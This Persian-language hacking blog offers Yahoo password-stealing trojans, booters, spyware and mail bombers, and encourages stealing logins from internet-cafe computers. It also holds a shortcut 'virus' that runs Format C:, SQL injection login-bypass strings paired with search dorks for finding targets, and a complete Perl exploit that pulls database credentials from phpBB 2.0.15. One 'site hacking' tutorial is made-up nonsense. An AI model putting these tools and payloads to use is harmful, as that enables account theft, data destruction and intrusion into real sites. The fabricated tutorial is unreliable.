بچه ها جامو عوض کردم به علت ضایع بودن اسم وب لاگ و...
HTTP://wrackful.blogfa.com
< FONT>دیگه رفتیم که رفتیم
اینجا که بدرد بخور نبودم خداکنه اونجا باشم
اگر بارنه ارزون بودم رفتم اگه مهربون بودم بازم رفتم خدافظ.
بچه ها خیلی خیلی خوش آمدید ×××اگرکسی سوالی در مبحث کامپیوتر داردبپرسدچون مبحث وب لاگ من کامپیوتراست
HTTP://wrackful.blogfa.com
< FONT>دیگه رفتیم که رفتیم
اینجا که بدرد بخور نبودم خداکنه اونجا باشم
اگر بارنه ارزون بودم رفتم اگه مهربون بودم بازم رفتم خدافظ.
http://www.iraqischools.com/news/
این دومیش و سومیش که خودشم نمیدونه باسه ی چی بوده به این میگند کرم یا مرض![]()
http://www.dkoontz.com/sitenews/
هک شده توسط حسین Terror Hellish است
یک سری ابزار برای یاهو مسنجر:
برنامه ای برای انجام تغييرات در Status:
برنامه ای برای Crack کردن یاهو که با این کار میتوانید چند یاهو باز کنید
برنامه ای برای ديدن Archive خود و ديگران:
برنامه ای برای راحتی کار با متن و شکل های yahoo در چت:
برنامه ای برای فهمیدن بودن یا نبون طرف در چت روشن بودن وب کم طرف و مشخص کردن رومی که فردمورد نظردر آن است
برنامه ای برای ورود به روم های پر:
برنامه ای برای پاک کردن ID خود از ليست دیگران:
برنامه ای که pm مورد نظر ما را هنگامی که بخواهيم به هر کسی که به ما pm دهد می دهد:
برنامه ای برای عکس گرفتن از وبکم افراد:
برنامه ای برای قفل کردن voice ديگران:
برنامه ای برای بيرون انداختن افراد از روم:
برنامه ای برای قفل کردن ID ديگران به طور موقت:
برنامه ای برای تغيير صدا:
برنامه ای برای بمب باران کردن ميل:
ابزارهای مفيد برای ويندوز:
برنامه ای برای فرستادن ايميل های جعلی(قبل از Download اين برنامه به من PM بديد):
برنامه ای برای زيبا کردن text:
برنامه ای برای ديدن username-password-phonenumber در Dialupهای xp:
برنامه ای برای ديدن پسورد های ستاره ای:
برنامه ای برای نشان دادن مدت زمان Download يک فايل:
برنامه های تروجان برای يافتن پسورد ياهو:
++MPS-1.5SE:
Smart-PS v1.3:
Nice:
Download
joojoo 1.21 tiny:
Snake EditServer:
Toxic-PsV1.0:
Yahoo!Spy:
یک سری برنامه ی بدرد بخور:
IconCollector:
MagicBinder-VB-Lib:
HashEncoder:
برنامه ها ی جاسوسی:
MYSPY:
007spy-trial:
دو بوتر و يک آنتی بوت ساده ولی قوی:
yahoofreezele:
(Yahoo Administrator booter v4.0 (booter:
(Yahoo!Shield (Anti boot:
چند تا بوتر خوب:
Matrix-Meltdown:
LoveToBootV21:
All+American+Booter:
AussieboyzYTunnelDisconnect:
برنامه ای برای پيدا کردن IP:
IP Scanner:
برنامه ای برای پنهان کردن IP:
IP-hider:
برنامه هایی برای Lagger کردن يک روم با افرادش:
Justin__LaGGeR:
Room Lagger:
Shut The Fuck Up 2.0:
Shut The Fuck Up 3.5:
فايلی برای از کار انداختن موس:
اینم یه سری برنامه ی توپ برای شما جیگرا
برنامه ای برای اونایی که میخوان زبان MaiL ِ آی دی شونو عوض کنن. اونم ۳ سوته
اینم یه سری NeeD FiLe جدید دیگه که میتونین بوتر Login کنید(که در مقاله ی بعدی یه config خوب ژیدا میکنم براتون)
یه UnLocke واقعاً قوی هست خودمم امتحانش کردم
یه برنامه که فقط ویس ON میکنه و فقط ویس داری تو روم بکس بوت هم نمیشه
یه برنامه برای Lock (قفل) کردن آی دی
یه برنامه برای پیدا کردن Ip شخص یا سایت مورد نظر که بدونه برنامشم قبلا توضیح دادم
یه برنامه برای پیدا کردن Ip شخص یا سایت مورد نظر(به دردتون میخوره)
يه بوتر واقعاً قوی و توپُخوراک اونایی که عشق بوت دارند
برنامه ای برای ديدن پسورد های ويندوز
یه آنتی بوتر نسبتا خوب
به زور چپیدن تو روم بد نیست بگیر بدردت میخوره
برنامه ای برای ريختن ID توی روم و گرفتن Talk به طور فضايی
Online یا Offline بودن فرد مورد نظر رو نشون میده
یه بوتر توپ
اينم برای Voice کشی توی چت روم های ياهو خوراکه اونایی هست که میخواند تو روم کسی رو خفه کنند
برای ساختن ID با دات. مثال DeViL.HeRoGaMe يا Enet. يا MY256. يا Sogua. برو حال کن
برنامه ای برای بستن و لاک کردن روم فکر کنم همتون خوشتون بیاد
بچه ها گفتم شاید لینک بالا کار نکنه این همون برنامست که هر چند تا که بخوای یاهو باز میکنی
برنامه ای برای در آوردن پسورد افراد در ياهو مسنجر همراه با دکودر باحال![]()
برنامه ای برای Search کردن Ip Proxy سبز برو حال کن
برنامه ای برای Login کردن چند آی دی بطور همزمان (برای ياهوی جديد)حال کنید!!!!![]()
برنامه ای برای Save کردن Flash های موجود در سايت
اينم سريالش Serial
اين برنامه خوراک اونايی هست که می خوان از کافی نت يوزر + پسورد اکانت بدزدن مخصوصا بروبچ فلکه اول ![]()
تو پاساژ سپید راحت از کافی نت هاش بدزدید![]()
برنامه ای برای قفل کردن Talk در چت رومهای ياهو
اينم آنتی بوتر قوی برای جیگرای بازدیدکننده
اينم سريالش Serial
اينم يه برنامه برای قفل (Lock) کردن ID در ياهو مسنجر
اينم يه برنامه برای اينکه ID قفل (Lock) شده در ياهو مسنجر را باز ( UnLock ) کنيد
اينم يه برنامه برای اونايی که می خوان با ويندوز XP سرويس پک ۱ بوتر Login کنن که یه Need File بالا هم گزاشتم
برای امرز دیگه بسته هم تو زیادیت میشه هم من خسته شدم بای جیگرا بازم اینجا بیاید
در اين روش شما نيازی به نصب هيچ برنامه ای نداريد و تنها با تنظيم اينترنت اكسپلورر خود و وارد كردن چند عدد در آن می توانيد از سد فيلترهای اينترنتی مخابرات عبور كنيد و با خيال راحت در در در دنيای اينترنت گردش كنيد - روش كار به اين صورت است
به قسمت Internet Option در Control Panel برويد و بر روی Connections رفته و بر روی سرويس اينترنتی كه از آن استفاده می كنيد و با آن را انتخاب نموده و بر روی Settings كليك كنيد - حال Use Proxy را تيك بزنيد و در قسمت آدرس يكی از شماره های IP را در جدول زير وارد كنيد و در مقابل آن و در قسمت Port - شماره پورت را وارد كنيد و كليك كنيد. اگر يكی از شماره ها جواب نداد و كار نكرد - يكی ديگر را امتحان كنيد .
تذكر : برای ورود به بعضی از سايتها ( مثلاً ايميل ياهو ) بايد تيك استفاده از پروكسی را موقتاً برداريد .
ميتوانيد از آدرس آی پی و پورتهای زير استفاده كنيد
IP Address Port
195.175.37.6-۸۰۸۰
217.110.71.114- 8080
195.175.37.23 -8080
210.187.110.230- 8080
61.107.109.130- 8080
62.231.38.245- 8080
211.126.196.172 -8080
62.190.148.33 -8080
202.134.0.136 -8080
203.197.203.35 -8080
200.69.129.242- 81
ليست پروکسي آزاد
البته اين پروکسی ها روی هر سروری جواب نميده ولی به امتحانش ميرزه!
218.89.1.200 8080 anonymous China 25.10.2005 Whois
61.135.158.115 80 anonymous China 25.10.2005 Whois
218.57.243.52 3128 transparent China 25.10.2005 Whois
200.21.18.149 80 transparent Colombia 25.10.2005 Whois
219.239.110.9 80 high anonymity China 25.10.2005 Whois
211.222.204.2 80 high anonymity South Korea 25.10.2005 Whois
61.135.158.117 80 anonymous China 25.10.2005 Whois
200.36.112.92 80 transparent Mexico 25.10.2005 Whois
202.108.119.227 80 anonymous China 25.10.2005 Whois
200.46.194.2 3128 transparent Panama 25.10.2005 Whois
206.13.102.131 3128 transparent United States 25.10.2005 Whois
213.176.6.226 80 anonymous Iran 25.10.2005 Whois
203.167.109.146 3128 transparent Philippines 25.10.2005 Whois
61.174.212.38 3128 transparent China 26.10.2005 Whois
61.135.158.95 80 anonymous China 25.10.2005 Whois
218.69.88.205 80 anonymous China 25.10.2005 Whois
218.57.243.36 3128 transparent China 25.10.2005 Whois
203.115.25.135 8080 transparent Sri Lanka 25.10.2005 Whois
195.175.37.7 80 transparent Turkey 25.10.2005 Whois
202.162.212.210 8080 transparent Indonesia 25.10.2005 Whois
210.212.176.228 80 anonymous India 25.10.2005 Whois
81.186.242.1 80 transparent Sweden 25.10.2005 Whois
195.24.194.5 8080 transparent Cameroon 25.10.2005 Whois
222.76.240.162 8080 anonymous China 25.10.2005 Whois
81.28.183.227 3128 high anonymity Russian Federation 25.10.2005 Whois
200.71.61.38 3128 transparent Colombia 25.10.2005 Whois
207.219.58.10 8080 transparent Canada 25.10.2005 Whois
85.98.44.17 80 high anonymity Turkey 25.10.2005 Whois
200.242.105.130 8080 anonymous Brazil 25.10.2005 Whois
203.113.130.59 80 high anonymity Vietnam 25.10.2005 Whois
61.135.158.121 80 anonymous China 25.10.2005 Whois
212.88.183.187 3128 transparent Austria 25.10.2005 Whois
61.144.244.72 80 high anonymity China 26.10.2005 Whois
60.195.26.85 8000 high anonymity China 26.10.2005 Whois
211.144.102.57 3128 anonymous China 25.10.2005 Whois
203.129.68.126 80 transparent Hong Kong 25.10.2005 Whois
222.43.34.94 80 transparent China 25.10.2005 Whois
80.14.86.23 8080 transparent France 25.10.2005 Whois
61.233.144.118 80 transparent China 25.10.2005 Whois
61.135.158.51 80 anonymous China 25.10.2005 Whois
202.175.234.163 8080 high anonymity Philippines 25.10.2005 Whois
200.226.137.10 8080 transparent Brazil 25.10.2005 Whois
61.135.158.109 80 anonymous China 25.10.2005 Whois
82.67.60.37 6588 high anonymity France 25.10.2005 Whois
61.135.158.129 80 anonymous China 25.10.2005 Whois
61.206.125.114 8080 transparent Japan 25.10.2005 Whois
202.150.93.122 3128 transparent Indonesia 25.10.2005 Whois
66.162.34.5 80 anonymous United States 25.10.2005 Whois
202.97.142.40 3128 transparent China 25.10.2005 Whois
61.135.158.118 80 anonymous China 25.10.2005 Whois
202.110.112.45 3128 high anonymity China 25.10.2005 Whois
61.135.158.83 80 anonymous China 25.10.2005 Whois
61.135.158.107 80 anonymous China 25.10.2005 Whois
61.135.158.102 80 anonymous China 25.10.2005 Whois
80.55.28.68 3128 transparent Poland 25.10.2005 Whois
213.84.121.156 3128 transparent Netherlands 25.10.2005 Whois
61.135.158.52 80 anonymous China 25.10.2005 Whois
61.135.158.116 80 anonymous China 25.10.2005 Whois
61.135.158.92 80 anonymous China 25.10.2005 Whois
148.233.116.69 8080 transparent Mexico 25.10.2005 Whois
210.177.167.17 80 anonymous Hong Kong 25.10.2005 Whois
203.162.168.163 80 high anonymity Vietnam 25.10.2005 Whois
195.175.37.10 8080 transparent Turkey 25.10.2005 Whois
200.174.85.193 3128 transparent Brazil 25.10.2005 Whois
61.135.158.97 80 anonymous China 25.10.2005 Whois
61.135.158.132 80 anonymous China 25.10.2005 Whois
211.48.62.46 80 transparent South Korea 25.10.2005 Whois
80.25.150.39 80 anonymous Spain 25.10.2005 Whois
65.120.159.171 8080 anonymous United States 25.10.2005 Whois
61.135.158.119 80 anonymous China 25.10.2005 Whois
80.80.12.125 80 transparent Denmark 25.10.2005 Whois
63.70.62.69 80 transparent United States 25.10.2005 Whois
212.92.5.161 3128 transparent Hungary 25.10.2005 Whois
212.53.102.119 80 high anonymity Switzerland 25.10.2005 Whois
210.245.156.203 8080 anonymous Hong Kong 25.10.2005 Whois
195.175.37.72 80 transparent Turkey 25.10.2005 Whois
203.199.36.215 3128 transparent India 25.10.2005 Whois
212.185.62.98 3128 anonymous Germany 25.10.2005 Whois
212.175.113.52 3128 anonymous Turkey 25.10.2005 Whois
61.131.55.138 8080 high anonymity China 26.10.2005 Whois
80.26.48.93 80 anonymous Spain 25.10.2005 Whois
148.74.1.11 8080 anonymous United States 25.10.2005 Whois
212.122.76.212 80 anonymous Lithuania 25.10.2005 Whois
81.208.107.106 3128 transparent Italy 25.10.2005 Whois
200.250.29.61 3128 transparent Brazil 25.10.2005 Whois
80.108.20.12 3128 transparent Austria 25.10.2005 Whois
195.97.103.67 3128 transparent Greece 25.10.2005 Whois
163.27.218.129 3128 transparent Taiwan 25.10.2005 Whois
12.222.111.137 80 anonymous United States 26.10.2005 Whois
59.144.162.85 6588 high anonymity India 26.10.2005 Whois
نحوه ساختن ویروس بلستر
این ویروس کارش خاموش کردن کامپیوتر ظرف ۳۰ ثانیه است . بدین ترتیب که وقتی اجرا میشه پیغامی تحت عنوان اینکه کامپیوتر شما ظرف مدت ۳۰ خاموش می شود می دهد .اول آنتی ویروس یاد میدم بدنم خوده ویروس . اول روی دسکتاپ راست کلیک کرده و گزینه New shortcut را انتخاب کرده و تایپ کنید shutdown -a و Next را زده نامی براش انتخاب کرده و Finish را بزنید .الان آنتی ویروس شما آماده است میتونید روش راست کلیک کرده گزینه Properties را انتخاب کرده و change Icon را زده و آیکون آنرا عوض کنید . حالا نحوه ساختن ویروس باز روی دسکتاپ راست کلیک کرده و گزینه New shortcut را انتخاب کرده و تایپ کنید shutdown -r و Next را زده نامی براش انتخاب کرده و Finish را بزنید . الان ویروس شما آماده است باز می توانید شکل آیکون آنرا عوض کنید . نحوه استفاده از آن هم به عهده خودتون است .
نحوه پیدا کردن IP
برای پیدا کردن IP یه شخص تو چت یا IP یه سایت کافیه برید تو start در قسمت Run تایپ کنید cmdبعد ok را کلیک کنید . یه صفحه سیاه باز میشه اونجا تایپ کنید netstat -r یا netstat -n و Enter را فشار دهید .
یه راه برای اینکه هک نشوید
بعضی از هکرا یه صفحه می سازند شبیه صفحه sing up یاهو وقتی یوزر و پسورد می نویسید میره به ادرس ایمل طر ف و شما هک میشید . پس مواظب باشید یوزر و پسورد خودتونو هرجایی ننویسید .
اگه هک شدید چکار کنید
وقتی دارید آیدی می سازید یا آدرس ایمیل تو فرمی که پر می کنید از شما تاریخ تولد می پرسه . اون تاریخ هیشه یادتون باشه . چون وقتی آیدی شما هک شد باید برید تو یاهو تو پنجره sing in یه جایی هست که نوشته Forget your ID or password کلیک کنید و بعد تاریخ تولد خودتونو و آیدیتونو نوشته و روی get new password کلیک کنید . به همین سادگی می تونید آیدی خودتونو پس بگیرید .
هک کردن سایتها با پی اچ پی نوک
خوب از php که بگذريم ميرسيم به پورتالهاي قويتر و بهتر به نام asp که گفتم که asp هم يک زبان برنامه نويسي تحت وب هستش که تنها مشکلي هم که داره تو قسمت ورود به کنترل پنلش هستش که با يک پسوورد ميشه وارد اون شد که اين اشکال به اين دليل که کسي که سايت رو طراحي کرده اين اشکالات : ( ) , ( , = . " . ' ) رو فيلتر نکرده و شما ميتونيد با يک پسوورد که اين علامات در اون به کار رفته سايت رو اينجکت کنيد که injection در زبان انگليسي به معني تزريق کردن ميباشد خوب حالا من طرض استفاده اين کار رو بهتون ميگم ابتدا تو گوگل يا ... سرچ کنيد :
inurl:login.asp
inurl:admin.asp
خوب ميتونيد يک کلمه فارسي يا عربي مثل في يا فارسي يا ... جلوي اينها بنويسيد خوب بالاخره تو کار هک بايد از خودتون هم يخورده ابتکار عمل نشون بديد خوب حالا اون پسووردها هم اينها هستند :
' or ''='
admin" or "a"="a
admin" or 1=1 --
admin' or 1=1 --
admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a </BODY< SPAN>>
</< SPAN>html>
phpbb2.0.15 آموزش هک
شما توسط این اموزش میتونید به راحتی یه فروم رو هک کنید تنها کاری که لازمه اینکه در اون سایت عضو شید که خودبه خود سایت به شما یه کوکی میده وبااستفاده از همین کوکی سایت رو هک کنید
برای این کار ابتدا ببینید کوکی شما در کجا ذخیره میشه که عموما در
C:\Documents and Settings\name of your pc\Cookies
شما داره حالا میرید نو و کوکی اون فروم وهرچی نوشته به غیر از ستاره اخرسش رو pcذخیره میشه که بسته به اسم
copy
میکنید تابه شما کلیه اطلاعات لازم واسه هک روبده past exploitمیکنیدحالا این کدرودر این
exploit:اینم
#!/usr/bin/perl
# *******************************
#*
#* phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#* This exploit gives the user all the details about the database
#* connection such as database host, username, password and
#* database name.
#*
#* Written by SecureD, gvr.secured
#*
#* Greetings to GvR, Jumento, PP, CKrew & friends
#*
# *******************************
use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured
print "+-----------------------------------------------------------------------+\r\n";
if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}
آموزش کلی مبارزه با ویرووس ها و آشنایی با آنها
آموزش مبارزه با ویرووسها =>
شما اولین کاری که برای مبارزه با اونا میکنین اینه که دستگاهتونو به یه آنتی ویرووس مجهز کنین که بهترینشون Norton.symantec.mcAfee.panda &avg هستش اما اینم بگم که آنتی ویرووسهای Norton روی بعضی از ویندوز های Xpجواب نمیده و باعث هنگ کردن سیستم میشه .
اگه شما آنتی ویرووس نداشتین و به ویرووس آلوده شدین اولین کار اینه که سیستم خودتون رو Restor کنین تا ویرووس به همه جا انتقال پیدا نکنه که برای Restor کردن مراحل زیر رو انجام بدین : =>
1- روی My computer راست کلیک کرده و Propertiseرو انتخاب کنین
2- از صفحه باز شده اون بالا لبه ی System Restore رو انتخاب کنین
3- گزینه Turn off System restore رو تیک بزنین و در آخر Apply ... OK
با این کار از ویرووسی شدن تمام سیستم جلوگیری میکنین .
قدم دوم شناسایی ویرووس هست که بازم با آنتی ویرووس های میشه پیدا کرد ( بهتره یه شناختی از ویرووس ها بهتون بدم )
آشنایی کلی با ویرووس های کامپیوتری
1- ویرووس ها در کل به سه گروه طبقه بندی میشن 1- اسب تروا (Troijan-hourse ) . کرم ها ( Worms ) . بمب های منطقی (Logical bomb )
اهداف ویرووس ها :
ویرووس ها جایی انتشار پیدا می کنن که دارای تغییر پذیری باشه مثل ( جداول - رکورد بوت - پرونده ها و ....... ) پرونده هایی که دارای پسوند های sys.bat.com & exe هستن هدفهای اونا هستن .
چگونگی انتشار ویرووس :
ویرووس ها بیشتر خودشون رو به اسناد و فولدر ها میچسبونن و از طریق اونا وارد میشن . اگه ما 2 تا فولدر داشته باشیم که دارای اسم های یکی باشن ولی پسوند هاشون فرق کنه کامپیوتر اول اون برنامرو اجرا میکنه که پسوند .com رو داشته باشه به همین علت ویرووسها خودشون رو با همون اسم فایل ها تکثیر می کنن اما با پسوند .com که کامپیوتر اونارو اجرا کنه .
ساختار ویرووس ها :
ویرووس ها از دو بخش تکثیر و تخریب تشکیل شده اند . بعضی از ویرووس ها فقط برنامرو آلوده می کنن. در برنامه های آلوده یک علامت می نویسن که به آنها امضای ویرووس میگن و وقتی ویرووس بخواد برنامرو آلوده کنه اول به دنبال امضاء میگرده اگه وجود نداشت اونو آلوده میکنه و الگه وجود داشت که میدونه برنامه آلوده هست
آنتی ویرووس ها :
آنتی ها دارای 2 گونه میباشن یکی مقیم و اون یکی غیر مقیم که فرق اونا اینه که آنتی مقیم به محض شروع فعالیت ویرووس اونو شناسایی و از بین میبره . اما آنتی غیر مقیم به این شکل نیست .
آنتی ویرووس ها یه دروازه هستن که همیشه وقتی برنامه بخواد اجرا بشه باید اول از آنتی بگذره و بعد به سیستم عامل بره . اما اگه آنتی وجود نداشته باشه برنامه یه راست میره به سیستم عامل .
معرفی چند ویرووس :
1-Disk killer اگر کامپیوتر بیشتر از 24 ساعت روشن باشه Hard disk رو خراب میکنه
2- lazy باعث کم شدن حافظه و سرعت سیستم میشه
3- Mistake تمام حروف را بر روی پرینتر عوض میکنه مثلا حرف c را k و k رو c چاپ میکنه
4- Pc-Flu باعث مختل شدن کار های آنتی ویرووس ها میشه
5- Blaster باعث ریست شدن کامپیوتر و تکثیر در آن میشود
6-Albania باعث تکثیر فراوان در کمتر از 3 ساعت است
7- Nimda باعث تکثیر فراوان شده و آیکون های اون شبیه به پاکت نامه است
هک کردن سایت بدون هیچ برنامه ای
۱: در مرحله اول باید از طریق کاممند پرت آی پی سایت رو بدست بیاوریم.
۲:در مرحله دوم شما می بایست و ارد آدرس c:\windows\web شوید.
۳:در مرحله سوم باید شما باید با ایجاد کردن فولدر هایی که در آن ها نا هماهنگی هایی وجود دارد
در سرور آن سایت اختلال ایجاد کنید.و به راحتی در ۳ مرحله آن سایت رو هک کنید.
--------------------------------------------------------------------------------
ما یاد داده بودیم که آیپی سایت رو میتونیم به سادگی به دست آوریم.
بعد از این که آی پی سایت رو به دست آوردیم. وارد پوشه c:\windows\web شده و مراحل زیر رو به
ترتیب انجام دهید. در واقع در این روش ما با ایجاد زبان های هک برنامه نویسی جاوا سرور آن سایت
رو هک میکنیم.پس مراحل زیر رو دنبال کنید.
--------------------------------------------------------------------------------
۱:وارد پوشه وب در ویندوز شده فایل ها رو خوب مشاهده کنید.حالا وارد پوشه
c:\windows\java شده.خب پس از وارد فولدر classes شده و در آن یک نوتپد باز کنید.
نام نوتپد مهم نیست. (**هکره لیزری**). حالا وارد آن شده و این نوشته ها رو تایپ کنید.
--------------------------------------------------------------------------------
lan\:Q:\victumip\server\567\jav57\source\view
فقط باید به جای victumip آی پی سایت رو قرار بدید.حالا وارد پوشه وب که قبلا رفته بودید شوید.
و یک فولدر به نام c:\windows\classes بسازید.توجه داشته باشید که حتما باید آدرس دقیق پوشه
کلاسس رو بهش بدید.خب حالا ۹۹ درصد کار تموم شده است.وارد سایتی که برای کنترل سایت
هست شوید مانند بلاگفا که برای مدیریت وبلاگ هستش.حالا در قسمت username آدرس سایت رو
بنویسید و ورود یا signin رو بزنید حالا باید وارد بخش مدیریت شوید اگر نشد به جای یوزر نیم سایت
آی پی سایت رو وارد کنید و مطمئن باشید که این دفعه میره.البته این هک کردن با پرت ۵۶۷ هستش
و این قوی ترین پرتیه که من برای هک کردن سایت میشناسم هستش.
PC Security Test 2005امنیت!!!!!
به کمک این برنامه می تونید از امنیت کامپیوتر در مقابل ویروس ها و هکرها اطمینان حاصل کنید.
اینم لینک دانلود برنامه : http://www.pc-st.com/us/pcsecuritytest.zip
دیگه برای این دفعه بسته خسته شدم فعلا بای.
كاهش ظرفيت فايل ها و آدرس های اينترنتی كه در كامپيوتر ذخيره می شوند.
پاك كردن هر روز فايل های موقت و آدرس های اينترنتی ، واقعاً اعصاب را خسته می كند. شما می توانيد Cashe خود را طوری تنظيم كنيد كه فقط اطلاعات كمی را بتوانيد ذخيره كنيد.
برای اين كار در Browser، Tools و سپس Internet Option را انتخاب كنيد. در پنجره باز شده بر روی قسمت Settings كليك كنيد. در آنجا قسمت Amount of disk space to use را برابر مقدار 1MB تنظيم كنيد.
استارت سريع!
اگر عمل Shutdown در كامپيوتر درست انجام نشود، كامپيوتر در استارت بعدی، برای اينكه هارد را از لحاظ داشتن خطا يا اشتباه چك كند، با برنامه Scandisk استارت می شود كه مستلزم صرف زمانی طولانی است. برای اينكه از اجرا شدن Scandisk جلوگيری كنيد، به ترتيب زير عمل كنيد:
از منوی استارت بر روی Run كليك كرده و بعد دستور msconfig را اجرا كنيد. سپس قسمت system configuration programs را باز كنيد و در قسمت Register، general كليك كنيد و سپس فرمان “ Scandisk after error by shutdown disabled “ را فعال كنيد. در آخر، همه پنچره ها را با دستور ok ببنديد و ويندوز را دوباره استارت كنيد
کلیک کن روی عکس وپر تو !!!
بچه ها بگیرید![]()
![]()
FREE
internet account ![]()
براي اينترنت رايگان
اينجا را کليک کنيد !ه
![]()
اين ويروس چيز سختي نيست ولی خيلي خطرناكه.
اول از همه روي دسكتاپ رايت كليك كنيد بعدش
New ShortCut بسازيد.
يه صفحه باز ميشه در اون بنويسيد:
Format C:/Autotest
سپس
Next را زده و در صفحه جديد كه باز ميشه يه اسم واسه ويروستون انتخاب كنيد.
سپس
Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد.
خب ديگه كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين.
اگه خواستين بفهمين چي ميشه به جاي
Format C:/autotest بنويسيدFormat a:/autotest
و يه فلاپي كه حاوي اطلاعات هستش در Flopy Drive خودقرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي شده.ميبينيد فلاپي
پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد.
اثرات W32.Blaster.Worm
این کرم بسیار پیشرفته باعث می شود تا سیستم شما تنها پس از گذشت 60 ثانیه از اتصال به اینترنت ، خاموش شود .
برای پاک سازی دستگاه خود مراحل زیر را بترتیب اجرا نمایید :
توجه :
اگر شرایط به گونه ای باشد که سیستم شما قبل از دریافت این فایلها خاموش شود ، دکمه start و سپس run را کلیک نموده و در کادر مربوط عبارت shutdown -a را تایپ نمایید . این روش باعث می شود فرایند خاموش شدن دستگاه شما متوقف شود .
دريافت: Windows XP Patch | Windows 2000 Patch
دريافت: FixBlast - W32.Blaster.Worm Removal Tool
**************************************************
خوب اينها فقط يه سری چرتو پرت بود ولی اصل مطلب اينجاست:
اين کرم با دستکاری رجيستری ويندوز با هر بار اجرای ويندوز بار گذاری ميشه و منتظر ميمونه تا کامپيوتر طرف کانکت بشه بعد هم حتما مثل بقيه ويروسها يه جستجويی در فايل های WAP يا ليست ايميل های Outlook می کنه و خودشو برای آدرس ايميل هايی که بدست آورده پست می کنه (اينجاشو شک دارم شايد اصلا خودشو نفرسته. الله اعلم) بعد هم يه پيام که اصلا يکی از پنجره های ويندوز ۲۰۰۰ و اکس پی هست رو نمايش می ده که از ۶۰ تا ۰ شمارش معکوس می کنه و بعد هم restart يا shut down . برای همين فکر می کنم اگر ويندوز غير از xp يا ۲۰۰۰ باشه اين کرم پيام گفته شده رو نمايش نده!
اين ويروس خودش رو در شاخه system يا system32 با نام msblas*.exe کپی می کنه و يه مقدار جديد در HKLM\Software\Microsoft\Windows\CurrentVersian\Run در رجيستری ويندوز بوجود مياره که باعش اجراش در هر بار راه اندازی ويندوز می شه. اين مقدار در کامپيوتر من "windows auto update" هست اما مطمئنا اين کرم باهوش تر از اينکه فقط از يه مقدار استفاده کنه!
خوب اينهمه اطلاعات برای چش بود؟ برای شما برنامه نويسا بود ديگه. برای تمرين هم که شده يه ويروس ياب بساز که اين کرم رو شناسايی و در صورت وجود پاک کنه (فقط هم همين کرم يه ويروس ياب کلفت نخاستيم!). برام بفرست تا کار هرکسی رو در هر زبون برنامه نويسی همين جا به نمايش بذاريم. من خودم هم اين کار رو می کنم. منتظر نظرات شما هستم.
نکته ی مهم:بعضی ها رو جو نگیره بگند این چه راهیه راه های راحت تری هم هست ولی نه اشتباه نکن این بهترین راهه چون به کل پاک میشوند
Vulnerability Scanner ابزاري است که به کمک اون ميشه کامپيوترهاي شبکه رو از نظر وجود سوراخهاي امنيتي تست کرد. vul scanner ها اين کار را به صورت اتوماتيک يا نيمهاتوماتيک انجام ميده.
